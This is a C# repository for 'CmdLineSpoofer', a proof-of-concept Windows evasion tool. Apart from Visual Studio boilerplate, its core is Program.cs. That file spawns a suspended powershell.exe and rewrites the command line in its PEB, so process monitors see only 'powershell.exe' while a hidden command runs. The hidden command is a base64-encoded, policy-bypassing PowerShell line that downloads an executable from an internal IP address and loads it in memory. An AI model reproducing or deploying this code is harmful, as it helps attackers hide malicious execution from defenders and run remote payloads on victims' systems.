├── .gitattributes
├── .gitignore
├── CmdLineSpoofer.sln
├── CmdLineSpoofer
├── App.config
├── CmdLineSpoofer.csproj
├── Native.cs
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── README.md
├── process_hacker.png
└── sysmon.png
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/CmdLineSpoofer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31205.134
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CmdLineSpoofer", "CmdLineSpoofer\CmdLineSpoofer.csproj", "{5D03EFC2-72E9-4410-B147-0A1A5C743999}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Debug|x64.ActiveCfg = Debug|x64
19 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Debug|x64.Build.0 = Debug|x64
20 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Release|x64.ActiveCfg = Release|x64
23 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {FA3EC8D6-EEF2-44A5-9491-0BC35B23551E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/CmdLineSpoofer/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CmdLineSpoofer/CmdLineSpoofer.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {5D03EFC2-72E9-4410-B147-0A1A5C743999}
8 | Exe
9 | CmdLineSpoofer
10 | CmdLineSpoofer
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 | true
26 |
27 |
28 | AnyCPU
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 | true
36 |
37 |
38 | true
39 | bin\x64\Debug\
40 | DEBUG;TRACE
41 | true
42 | full
43 | x64
44 | 7.3
45 | prompt
46 | true
47 |
48 |
49 | bin\x64\Release\
50 | TRACE
51 | true
52 | true
53 | pdbonly
54 | x64
55 | 7.3
56 | prompt
57 | true
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
--------------------------------------------------------------------------------
/CmdLineSpoofer/Native.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace CmdLineSpoofer
5 | {
6 | public class Native
7 | {
8 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
9 | public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreateProcessFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
10 |
11 | [DllImport("ntdll.dll", SetLastError = true)]
12 | public static extern int NtQueryInformationProcess(IntPtr hProcess, PROCESSINFOCLASS pic, out PROCESS_BASIC_INFORMATION pbi, int cb, out int pSize);
13 |
14 | [DllImport("kernel32.dll", SetLastError = true)]
15 | public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesRead);
16 |
17 | [DllImport("kernel32.dll")]
18 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
19 |
20 | [DllImport("kernel32.dll", SetLastError = true)]
21 | public static extern uint ResumeThread(IntPtr hThread);
22 |
23 | [StructLayout(LayoutKind.Sequential)]
24 | public unsafe struct PEB
25 | {
26 | public fixed byte Filler[16];
27 | // we don't care too much for the preceeding elements in the struct
28 |
29 | public IntPtr ImageBaseAddress;
30 | public IntPtr Ldr;
31 | public IntPtr ProcessParameters;
32 |
33 | // we don't care too much for the rest of the struct
34 | };
35 |
36 | [StructLayout(LayoutKind.Sequential)]
37 | public unsafe struct RTL_USER_PROCESS_PARAMETERS
38 | {
39 | public fixed byte Filler[112];
40 | // we don't care too much for the preceeding elements in the struct
41 |
42 | public ushort Length;
43 | public ushort MaximumLength;
44 | public IntPtr CommandLine;
45 |
46 | // we don't care too much for the rest of the struct
47 | }
48 |
49 | [StructLayout(LayoutKind.Sequential)]
50 | public struct SECURITY_ATTRIBUTES
51 | {
52 | public int nLength;
53 | public unsafe byte* lpSecurityDescriptor;
54 | public int bInheritHandle;
55 | }
56 |
57 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
58 | public struct STARTUPINFO
59 | {
60 | public Int32 cb;
61 | public string lpReserved;
62 | public string lpDesktop;
63 | public string lpTitle;
64 | public Int32 dwX;
65 | public Int32 dwY;
66 | public Int32 dwXSize;
67 | public Int32 dwYSize;
68 | public Int32 dwXCountChars;
69 | public Int32 dwYCountChars;
70 | public Int32 dwFillAttribute;
71 | public Int32 dwFlags;
72 | public Int16 wShowWindow;
73 | public Int16 cbReserved2;
74 | public IntPtr lpReserved2;
75 | public IntPtr hStdInput;
76 | public IntPtr hStdOutput;
77 | public IntPtr hStdError;
78 | }
79 |
80 | [StructLayout(LayoutKind.Sequential)]
81 | public struct PROCESS_INFORMATION
82 | {
83 | public IntPtr hProcess;
84 | public IntPtr hThread;
85 | public int dwProcessId;
86 | public int dwThreadId;
87 | }
88 |
89 | [Flags]
90 | public enum CreateProcessFlags
91 | {
92 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
93 | CREATE_DEFAULT_ERROR_MODE = 0x04000000,
94 | CREATE_NEW_CONSOLE = 0x00000010,
95 | CREATE_NEW_PROCESS_GROUP = 0x00000200,
96 | CREATE_NO_WINDOW = 0x08000000,
97 | CREATE_PROTECTED_PROCESS = 0x00040000,
98 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
99 | CREATE_SEPARATE_WOW_VDM = 0x00000800,
100 | CREATE_SHARED_WOW_VDM = 0x00001000,
101 | CREATE_SUSPENDED = 0x00000004,
102 | CREATE_UNICODE_ENVIRONMENT = 0x00000400,
103 | DEBUG_ONLY_THIS_PROCESS = 0x00000002,
104 | DEBUG_PROCESS = 0x00000001,
105 | DETACHED_PROCESS = 0x00000008,
106 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
107 | INHERIT_PARENT_AFFINITY = 0x00010000
108 | }
109 |
110 | public struct PROCESS_BASIC_INFORMATION
111 | {
112 | public int ExitStatus;
113 | public IntPtr PebBaseAddress;
114 | public UIntPtr AffinityMask;
115 | public int BasePriority;
116 | public UIntPtr UniqueProcessId;
117 | public UIntPtr InheritedFromUniqueProcessId;
118 | }
119 |
120 | public enum PROCESSINFOCLASS
121 | {
122 | ProcessBasicInformation = 0x00,
123 | ProcessQuotaLimits = 0x01,
124 | ProcessIoCounters = 0x02,
125 | ProcessVmCounters = 0x03,
126 | ProcessTimes = 0x04,
127 | ProcessBasePriority = 0x05,
128 | ProcessRaisePriority = 0x06,
129 | ProcessDebugPort = 0x07,
130 | ProcessExceptionPort = 0x08,
131 | ProcessAccessToken = 0x09,
132 | ProcessLdtInformation = 0x0A,
133 | ProcessLdtSize = 0x0B,
134 | ProcessDefaultHardErrorMode = 0x0C,
135 | ProcessIoPortHandlers = 0x0D,
136 | ProcessPooledUsageAndLimits = 0x0E,
137 | ProcessWorkingSetWatch = 0x0F,
138 | ProcessUserModeIOPL = 0x10,
139 | ProcessEnableAlignmentFaultFixup = 0x11,
140 | ProcessPriorityClass = 0x12,
141 | ProcessWx86Information = 0x13,
142 | ProcessHandleCount = 0x14,
143 | ProcessAffinityMask = 0x15,
144 | ProcessPriorityBoost = 0x16,
145 | ProcessDeviceMap = 0x17,
146 | ProcessSessionInformation = 0x18,
147 | ProcessForegroundInformation = 0x19,
148 | ProcessWow64Information = 0x1A,
149 | ProcessImageFileName = 0x1B,
150 | ProcessLUIDDeviceMapsEnabled = 0x1C,
151 | ProcessBreakOnTermination = 0x1D,
152 | ProcessDebugObjectHandle = 0x1E,
153 | ProcessDebugFlags = 0x1F,
154 | ProcessHandleTracing = 0x20,
155 | ProcessIoPriority = 0x21,
156 | ProcessExecuteFlags = 0x22,
157 | ProcessResourceManagement = 0x23,
158 | ProcessCookie = 0x24,
159 | ProcessImageInformation = 0x25,
160 | ProcessCycleTime = 0x26,
161 | ProcessPagePriority = 0x27,
162 | ProcessInstrumentationCallback = 0x28,
163 | ProcessThreadStackAllocation = 0x29,
164 | ProcessWorkingSetWatchEx = 0x2A,
165 | ProcessImageFileNameWin32 = 0x2B,
166 | ProcessImageFileMapping = 0x2C,
167 | ProcessAffinityUpdateMode = 0x2D,
168 | ProcessMemoryAllocationMode = 0x2E,
169 | ProcessGroupInformation = 0x2F,
170 | ProcessTokenVirtualizationEnabled = 0x30,
171 | ProcessConsoleHostProcess = 0x31,
172 | ProcessWindowInformation = 0x32,
173 | ProcessHandleInformation = 0x33,
174 | ProcessMitigationPolicy = 0x34,
175 | ProcessDynamicFunctionTableInformation = 0x35,
176 | ProcessHandleCheckingMode = 0x36,
177 | ProcessKeepAliveCount = 0x37,
178 | ProcessRevokeFileHandles = 0x38,
179 | ProcessWorkingSetControl = 0x39,
180 | ProcessHandleTable = 0x3A,
181 | ProcessCheckStackExtentsMode = 0x3B,
182 | ProcessCommandLineInformation = 0x3C,
183 | ProcessProtectionInformation = 0x3D,
184 | ProcessMemoryExhaustion = 0x3E,
185 | ProcessFaultInformation = 0x3F,
186 | ProcessTelemetryIdInformation = 0x40,
187 | ProcessCommitReleaseInformation = 0x41,
188 | ProcessDefaultCpuSetsInformation = 0x42,
189 | ProcessAllowedCpuSetsInformation = 0x43,
190 | ProcessSubsystemProcess = 0x44,
191 | ProcessJobMemoryInformation = 0x45,
192 | ProcessInPrivate = 0x46,
193 | ProcessRaiseUMExceptionOnInvalidHandleClose = 0x47,
194 | ProcessIumChallengeResponse = 0x48,
195 | ProcessChildProcessInformation = 0x49,
196 | ProcessHighGraphicsPriorityInformation = 0x4A,
197 | ProcessSubsystemInformation = 0x4B,
198 | ProcessEnergyValues = 0x4C,
199 | ProcessActivityThrottleState = 0x4D,
200 | ProcessActivityThrottlePolicy = 0x4E,
201 | ProcessWin32kSyscallFilterInformation = 0x4F,
202 | ProcessDisableSystemAllowedCpuSets = 0x50,
203 | ProcessWakeInformation = 0x51,
204 | ProcessEnergyTrackingState = 0x52,
205 | ProcessManageWritesToExecutableMemory = 0x53,
206 | ProcessCaptureTrustletLiveDump = 0x54,
207 | ProcessTelemetryCoverage = 0x55,
208 | ProcessEnclaveInformation = 0x56,
209 | ProcessEnableReadWriteVmLogging = 0x57,
210 | ProcessUptimeInformation = 0x58,
211 | ProcessImageSection = 0x59,
212 | ProcessDebugAuthInformation = 0x5A,
213 | ProcessSystemResourceManagement = 0x5B,
214 | ProcessSequenceNumber = 0x5C,
215 | ProcessLoaderDetour = 0x5D,
216 | ProcessSecurityDomainInformation = 0x5E,
217 | ProcessCombineSecurityDomainsInformation = 0x5F,
218 | ProcessEnableLogging = 0x60,
219 | ProcessLeapSecondInformation = 0x61,
220 | ProcessFiberShadowStackAllocation = 0x62,
221 | ProcessFreeFiberShadowStackAllocation = 0x63,
222 | MaxProcessInfoClass = 0x64
223 | };
224 | }
225 | }
226 |
--------------------------------------------------------------------------------
/CmdLineSpoofer/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 | using System.Text;
5 |
6 | using static CmdLineSpoofer.Native;
7 |
8 | namespace CmdLineSpoofer
9 | {
10 | class Program
11 | {
12 | static void Main(string[] args)
13 | {
14 | // the malicious command
15 | string maliciousCommand = "powershell.exe -exec bypass -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgAyADgALwBwAC4AZQB4AGUAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAKAAsACAAWwBzAHQAcgBpAG4AZwBbAF0AXQAgACgAJwAxADkAMgAuADEANgA4AC4AMQAuADIAMgA4ACcALAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAUABJAEQALAAgACcAMQAwACcAKQApACkAOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAB9AA==\0";
16 |
17 | // the command to spoof
18 | string spoofedCommand = "powershell.exe".PadRight(maliciousCommand.Length, ' ');
19 |
20 | Debug("[+] Spoofing command: " + spoofedCommand.Trim(' '));
21 |
22 | // spawn a process to spoof the command line of
23 | STARTUPINFO si = new STARTUPINFO();
24 | SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
25 | bool success = CreateProcess(null, spoofedCommand, ref sa, ref sa, false, CreateProcessFlags.CREATE_SUSPENDED | CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, "C:\\windows\\", ref si, out PROCESS_INFORMATION pi);
26 |
27 | if(!success)
28 | {
29 | Debug("[!] Unable to spawn process!");
30 | return;
31 | }
32 |
33 | Debug("[+] Process spawned, PID: {0}", new string[] { pi.dwProcessId.ToString() });
34 |
35 | // grab the PEB address of the newly spawned process
36 | PROCESSINFOCLASS pic = new PROCESSINFOCLASS();
37 | PROCESS_BASIC_INFORMATION pbi = new PROCESS_BASIC_INFORMATION();
38 |
39 | int status = NtQueryInformationProcess(pi.hProcess, pic, out pbi, Marshal.SizeOf(pbi), out int retLength);
40 |
41 | if (status != 0)
42 | {
43 | Debug("[!] Unable to read PEB address!");
44 | return;
45 | }
46 |
47 | Debug("[+] PEB Address: 0x{0}", new string[] { pbi.PebBaseAddress.ToString("X") });
48 |
49 | // read the PEB structure, so we can get the ProcessParameters address
50 | PEB peb;
51 | byte[] pebBuffer = new byte[Marshal.SizeOf(new PEB())];
52 | ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, pebBuffer, pebBuffer.Length, out IntPtr bytesRead);
53 |
54 | unsafe
55 | {
56 | fixed (byte* ptr = pebBuffer)
57 | {
58 | peb = (PEB)Marshal.PtrToStructure((IntPtr)ptr, typeof(PEB));
59 | }
60 | }
61 |
62 | Debug("[+] ProcessParameters Address: 0x{0}", new string[] { peb.ProcessParameters.ToString("X") });
63 |
64 | // read the ProcessParameters structure, so we can get the CmdLine address
65 | RTL_USER_PROCESS_PARAMETERS procParams;
66 | byte[] uppBuffer = new byte[Marshal.SizeOf(new RTL_USER_PROCESS_PARAMETERS())];
67 | ReadProcessMemory(pi.hProcess, peb.ProcessParameters, uppBuffer, uppBuffer.Length, out bytesRead);
68 |
69 | unsafe
70 | {
71 | fixed (byte* ptr = uppBuffer)
72 | {
73 | procParams = (RTL_USER_PROCESS_PARAMETERS)Marshal.PtrToStructure((IntPtr)ptr, typeof(RTL_USER_PROCESS_PARAMETERS));
74 | }
75 | }
76 |
77 | Debug("[+] CommandLine Address: 0x{0}", new string[] { procParams.CommandLine.ToString("X") });
78 |
79 | // read the CommandLine address
80 | string cmdLine;
81 | byte[] cmdLineBytes = new byte[procParams.Length];
82 | ReadProcessMemory(pi.hProcess, procParams.CommandLine, cmdLineBytes, cmdLineBytes.Length, out bytesRead);
83 |
84 | unsafe
85 | {
86 | fixed (byte* ptr = cmdLineBytes)
87 | {
88 | cmdLine = Encoding.Unicode.GetString(cmdLineBytes);
89 | }
90 | }
91 |
92 | Debug("[+] Original CommandLine: {0}", new string[] { cmdLine });
93 |
94 | // we need to write byte array to procParams.CommandLine
95 | byte[] newCmdLine = Encoding.Unicode.GetBytes(maliciousCommand);
96 | WriteProcessMemory(pi.hProcess, procParams.CommandLine, newCmdLine, newCmdLine.Length, out IntPtr lpNumberOfBytesWritten);
97 |
98 | // we also need to write the spoofed command length as ushort to peb.ProcessParameters + 112 bytes
99 | byte[] sizeOfCmdLine = BitConverter.GetBytes((ushort)("powershell.exe".Length * 2));
100 | WriteProcessMemory(pi.hProcess, IntPtr.Add(peb.ProcessParameters, 112), sizeOfCmdLine, sizeOfCmdLine.Length, out lpNumberOfBytesWritten);
101 |
102 | Debug("[+] New CommandLine: {0}, written to process", new string[] { maliciousCommand });
103 |
104 | // resume the process
105 | ResumeThread(pi.hThread);
106 |
107 | Debug("[+] Resuming process");
108 |
109 | Debug("Press a key to end PoC...");
110 | Console.ReadLine();
111 | }
112 |
113 | public static void Debug(string text, string[] args)
114 | {
115 | #if DEBUG
116 | Console.WriteLine(text, args);
117 | #endif
118 | }
119 |
120 | public static void Debug(string text)
121 | {
122 | #if DEBUG
123 | Console.WriteLine(text, new string[] { });
124 | #endif
125 | }
126 | }
127 | }
128 |
--------------------------------------------------------------------------------
/CmdLineSpoofer/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("CmdLineSpoofer")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("CmdLineSpoofer")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
